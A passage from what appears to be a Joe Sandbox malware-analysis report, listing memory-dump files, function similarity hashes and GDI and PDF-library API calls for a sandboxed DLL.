                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: #214
                                                                                                        • String ID: Link$Rect$Subtype
                                                                                                        • API String ID: 1405426997-3862875103
                                                                                                        • Opcode ID: b13151f83b9e69bbbe14fa3c4d3e41fa1b8336e40ccb261fc66cd86d8cc6c111
                                                                                                        • Instruction ID: ccad8df06f60189834e12005d6ca8e20fcbdec633ac269785096852fe018f0f1
                                                                                                        • Opcode Fuzzy Hash: b13151f83b9e69bbbe14fa3c4d3e41fa1b8336e40ccb261fc66cd86d8cc6c111
                                                                                                        • Instruction Fuzzy Hash: A6C1F531B002198FDF04DF69C9949AEB7B9EF99218B100529DD16ABF41DB32ED05CBA1
                                                                                                        APIs
                                                                                                        • #73.IEPDF32(?), ref: 6C3AD777
                                                                                                          • Part of subcall function 6C3ACEE0: #70.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6C3ACEEB
                                                                                                        • #73.IEPDF32(?), ref: 6C3AD80A
                                                                                                        • #73.IEPDF32(00000000,?,?,Rect), ref: 6C3AD915
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BBox$Rect
                                                                                                        • API String ID: 0-3854271352
                                                                                                        • Opcode ID: ae9e95ac2c9a37a3e01b7ec34b0973e56e627c10a262a49111c1a6910d3fa212
                                                                                                        • Instruction ID: b566128e49a950789f56f16b25289def73c5ba42717d961bbd33b89acf0cbac8
                                                                                                        • Opcode Fuzzy Hash: ae9e95ac2c9a37a3e01b7ec34b0973e56e627c10a262a49111c1a6910d3fa212
                                                                                                        • Instruction Fuzzy Hash: 73C1F771B012199FDB04DFA5D880AAEB7B5FF89758F100128ED55ABB40DB31E916CFA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Annot$Type
                                                                                                        • API String ID: 0-395718979
                                                                                                        • Opcode ID: c85bffbf56741e9872f73d277ac25b99df2bedaa6baff283ab2481a4332347bc
                                                                                                        • Instruction ID: cfa1a04880aa950b7c557cdbf575d8d8d63b0e9503fb315a9a64929f43fe31da
                                                                                                        • Opcode Fuzzy Hash: c85bffbf56741e9872f73d277ac25b99df2bedaa6baff283ab2481a4332347bc
                                                                                                        • Instruction Fuzzy Hash: A4B1E435B003188FEB14DFA5C8816AEB7B5FF89344F004969D959ABB40EB31A916CF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 61cdb8cdb3b026a28372f95b4d6263aaeaec4f8466463fecebe316e5c686cf62
                                                                                                        • Instruction ID: ed15809b7062775ea7d9e26e6f1fb698ac5d4fe98bdaf22355f125a90d72078b
                                                                                                        • Opcode Fuzzy Hash: 61cdb8cdb3b026a28372f95b4d6263aaeaec4f8466463fecebe316e5c686cf62
                                                                                                        • Instruction Fuzzy Hash: E2810335B017298FDB40DF79C88066AB7B5FF99354F104629EA25ABB40EB30E845CB90
                                                                                                        APIs
                                                                                                        • SetStretchBltMode.GDI32(00000000,00000004), ref: 6C38FC9B
                                                                                                        • GetObjectType.GDI32(?), ref: 6C38FCA4
                                                                                                        • CreateBitmap.GDI32 ref: 6C38FCD3
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6C38FCDD
                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 6C38FCFD
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 6C38FD21
                                                                                                        • DeleteObject.GDI32(00000000), ref: 6C38FD28
                                                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 6C38FD3B
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 6C38FD45
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 6C38FD4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CapsDevice$Select$BitmapCreateDeleteModeStretchType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3133578033-0
                                                                                                        • Opcode ID: 36f3d657d0539ad095e4783a73f73185e013fc97f5768fca35954e34f68aded7
                                                                                                        • Instruction ID: 6655895a6d333e41f2cd81654b63354f8d8cadbefec3303caa23efe36c407655
                                                                                                        • Opcode Fuzzy Hash: 36f3d657d0539ad095e4783a73f73185e013fc97f5768fca35954e34f68aded7
                                                                                                        • Instruction Fuzzy Hash: 293163B1A007449FDB249F34C845A6BBBF4FF49710F008A2DE99686651EB70EA44CBA4
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553940938.000000006C70F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553983544.000000006C713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554011564.000000006C71B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1554033542.000000006C71F000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_6c2d0000_hv.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Ul$Highlight$Subtype
                                                                                                        • API String ID: 0-3869343903
                                                                                                        • Opcode ID: 2b3a2d085a35befd7a2c7c718dde7534aa23d20a365a170e208a36c10362369c
                                                                                                        • Instruction ID: 00296f8eb903d24a3cbe6a38ea6e0535a3a97d91f57b965d04f19e8331a6993f
                                                                                                        • Opcode Fuzzy Hash: 2b3a2d085a35befd7a2c7c718dde7534aa23d20a365a170e208a36c10362369c
                                                                                                        • Instruction Fuzzy Hash: 74213771B0011D8FEB049EA4A880A7B7369EF88614F110928D9285FB50E733D913CBD0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
